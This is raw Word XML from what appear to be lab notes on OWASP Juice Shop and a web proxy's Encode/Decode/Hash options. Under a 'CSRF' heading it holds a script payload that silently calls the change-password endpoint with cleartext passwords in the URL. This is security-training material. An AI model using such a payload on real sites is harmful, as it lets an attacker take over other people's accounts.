      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7ADF3BE4">
        <w:rPr/>
        <w:t>Go to Change Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7ADF3BE4" w:rsidP="449E37A7" w:rsidRDefault="7ADF3BE4" w14:paraId="51C04081" w14:textId="6DA42FC0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7ADF3BE4">
        <w:drawing>
          <wp:inline wp14:editId="5A49C2BF" wp14:anchorId="324BB19B">
            <wp:extent cx="4572000" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1731550855" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf9eac3bd730f4143">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5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="295F8ABE" w14:textId="1AEE9852">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="05546816" w14:textId="6D7C3771">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t xml:space="preserve">to perform unwanted attack </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="54190F44" w14:textId="12E31717">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="2C184673" w14:textId="5229FF9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>xmlhttp = XMLHttpRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="534D9FFB" w14:textId="1AC0505C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>xmlhttp.open('GET' ,'https://juice-shop.herokuapp.com/rest/user/change-password?current=Sowmy@369&amp;new=Sowmy@123&amp;repeat=Sowmy@123');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="4083D29E" w14:textId="7BB3590E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>xmlhttp.send()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B5F807C" w:rsidP="55820FFD" w:rsidRDefault="5B5F807C" w14:paraId="78306DF3" w14:textId="2DADA114">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5B5F807C">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t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="33242FE3" w14:textId="51F98712">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="1366058B" w14:textId="7BB3118A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Options Encode/Decode screen </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="76F3A8FA" w14:textId="66F8CD6D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This screen allows you to configure the </w:t>
      </w:r>
      <w:hyperlink r:id="R2bfa83cf70ad4736">
        <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:noProof w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Encode/Decode/Hash</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> options: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="3A05B1CE" w14:textId="3548A5C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 - Charset </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="12B01DA4" w14:textId="36E975B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Allows the user to select which character set should be used for Base64 conversions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="734D9EC4" w14:textId="40D28279">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 - Break Lines </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="25C36133" w14:textId="150EE8B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Indicates whether or not Base64 encoding should break lines at 76 characters (MIME standard).</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="4B73C804" w14:textId="51E5DD72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashers - Always output lower case? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BA3EBBF" w:rsidP="55820FFD" w:rsidRDefault="5BA3EBBF" w14:paraId="2BE51894" w14:textId="355F9299">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5BA3EBBF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Indicates whether or not the output of predefined Hash processors should always be lower case or not (upper case).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="74819F71" w14:textId="6BDAD41F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="3A760592" w14:textId="0CF0D73E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1E5D3FCB" w14:textId="5D5727F2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="0E701450" w14:textId="37554D5F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="3DAAFC8A" w14:textId="2F867851">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="1BD4DA41" w14:textId="13264A5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="45D5B289" w:rsidP="449E37A7" w:rsidRDefault="45D5B289" w14:paraId="7BF271E5" w14:textId="76DB3146">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="45D5B289">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45D5B289" w:rsidP="449E37A7" w:rsidRDefault="45D5B289" w14:paraId="27A06E46" w14:textId="3B47633C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="45D5B289">
        <w:drawing>
          <wp:inline wp14:editId="48A31EBC" wp14:anchorId="2BADBD0C">
            <wp:extent cx="4572000" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="765913704" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R096ec69be37641fa">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="45D5B289" w:rsidP="449E37A7" w:rsidRDefault="45D5B289" w14:paraId="7EEB6993" w14:textId="582B206D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="45D5B289">
        <w:rPr/>
        <w:t>Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45D5B289" w:rsidP="449E37A7" w:rsidRDefault="45D5B289" w14:paraId="55213149" w14:textId="24241599">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="45D5B289">
        <w:drawing>
          <wp:inline wp14:editId="069B78D8" wp14:anchorId="722435B9">
            <wp:extent cx="4572000" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1151604106" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Ra3a926793b0f4097">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45D5B289" w:rsidP="449E37A7" w:rsidRDefault="45D5B289" w14:paraId="1CE75444" w14:textId="3DECE8E3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="45D5B289">
        <w:rPr/>
        <w:t>Encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="33BF03C3" w:rsidP="449E37A7" w:rsidRDefault="33BF03C3" w14:paraId="7153AD17" w14:textId="7ABAFA38">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33BF03C3">
        <w:drawing>
          <wp:inline wp14:editId="4AE8998E" wp14:anchorId="4C9D034B">
            <wp:extent cx="4572000" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158696954" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R5cab3e135e7647ae">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="5EB69865" w14:textId="520AA6E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="33BF03C3" w:rsidP="449E37A7" w:rsidRDefault="33BF03C3" w14:paraId="7726D13E" w14:textId="455607CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33BF03C3">
        <w:rPr/>
        <w:t>Decode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="33BF03C3" w:rsidP="449E37A7" w:rsidRDefault="33BF03C3" w14:paraId="7EC56EB3" w14:textId="7FE11361">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33BF03C3">
        <w:drawing>
          <wp:inline wp14:editId="31B404D1" wp14:anchorId="7F39F3C1">
            <wp:extent cx="4572000" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="921466261" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rac4580bf557540b1">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="48236B91" w14:textId="3242B90B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="33BF03C3" w:rsidP="449E37A7" w:rsidRDefault="33BF03C3" w14:paraId="273771F2" w14:textId="56361D8A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33BF03C3">
        <w:rPr/>
        <w:t>Hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="33BF03C3" w:rsidP="449E37A7" w:rsidRDefault="33BF03C3" w14:paraId="7EC24620" w14:textId="551630EE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33BF03C3">
        <w:drawing>
          <wp:inline wp14:editId="44AF0CA7" wp14:anchorId="35A67A1B">
            <wp:extent cx="4572000" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1361557411" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R20a05c25392e4e1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B8460F5" w:rsidP="449E37A7" w:rsidRDefault="7B8460F5" w14:paraId="2651B0C7" w14:textId="12ED9BDD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7B8460F5">
        <w:rPr/>
        <w:t>----------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
